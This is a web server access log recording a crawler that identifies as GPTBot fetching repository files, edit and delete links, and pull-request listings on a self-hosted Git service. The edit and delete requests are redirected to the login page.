+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" -[17/Feb/2026:17:43:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/storage.cpython-312.pyc" -[17/Feb/2026:17:43:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/__pycache__/storage.cpython-312.pyc" -[17/Feb/2026:17:44:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/storage.cpython-312.pyc" -[17/Feb/2026:17:44:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/__pycache__/storage.cpython-312.pyc" -[17/Feb/2026:17:44:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" -[17/Feb/2026:17:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" -[17/Feb/2026:17:44:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" -[17/Feb/2026:17:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" -[17/Feb/2026:17:44:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" -[17/Feb/2026:17:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" -[17/Feb/2026:17:44:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" -[17/Feb/2026:17:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" -[17/Feb/2026:17:44:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" -[17/Feb/2026:17:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" -[17/Feb/2026:17:44:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" -[17/Feb/2026:17:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" -[17/Feb/2026:17:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11180] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11179] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:17:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=source" [Client 74.7.227.38] [Length 12960] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:17:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:17:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=rendered" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:17:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11180] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11096] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" -[17/Feb/2026:17:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:17:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10083] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:44:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:17:44:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12525] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11448] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:17:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12526] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:44:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11447] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:17:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11839] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11044] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11838] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11047] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py?display=source" [Client 74.7.227.38] [Length 12555] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py" -[17/Feb/2026:17:44:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/calculator.py?display=source" [Client 74.7.227.38] [Length 13082] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/calculator.py" -[17/Feb/2026:17:44:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:17:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:17:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:17:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9958] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" -[17/Feb/2026:17:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12770] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 